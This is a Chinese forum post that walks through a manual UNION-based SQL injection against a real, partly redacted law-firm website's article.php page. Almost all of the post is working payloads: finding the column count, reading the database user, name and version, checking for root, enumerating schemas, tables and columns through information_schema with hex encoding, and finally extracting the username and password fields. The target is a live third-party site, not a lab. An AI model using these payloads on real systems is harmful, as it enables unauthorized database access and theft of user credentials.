设为首页 收藏本站
查看: 1122|回复: 0

[经验分享] PHP手工注入初探

[复制链接]

尚未签到

发表于 2018-12-22 12:05:30 | 显示全部楼层 |阅读模式
注:为了网站的安全,对网址做了处理

***目标:http://www.lawxxxxxxx.com.cn

注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377

http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15  出错,那么就是14

http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
------------------------------------------------
页面出现的数字是8和12
------------------------------------------------
用以下的函数来得到我们想要的
user()        得到连接数据库的用户名           lawyerxxxx@manaxxx.xxxx.com
database() 得到数据库名                        lawyerxxxxxx
version()  得到版本                            5.1.53-log

用函数来替换12,得到相关的信息
-----------------------------------------------
判断权限
ord(mid(user(),1,1))=114/*   返回错误就不是root权限
--------------------------------------
列出数据库表 需要转编码
unhex(hex(group_concat(schema_name)))
                       (table_name)))
                       (column_name)))
例如:
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,unhex(hex(group_concat(schema_name)))
,13,14 from information_schema.schemata        列出数据库    information_schema,lawyerxxxxxx
------------------------------------------
下面的需要转码的 转为hex编码 (用工具转)
-----------------------------------------------------------------------------------

追加列表
    from information_schema.schemata   列数据库
    from information_schema.tables where table_shema=      列用户
    from information_schema.columns where table_name=      列表
例如:
http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(table_name)))
,13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(数据库名)

http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(column_name)))
,13,14 from information_schema.columns where table_name=(表名)
-------------------------------------------
上面的需要转码的转为hex编码
--------------------------------------------------------------------------------

获取用户名:

http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,用户字段名,9,10,11,
密码字段名,13,14 from 表名






运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-654391-1-1.html 上篇帖子: Discuz!7.2 common.inc.php 学习 下篇帖子: php5.2.5安装xcache
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表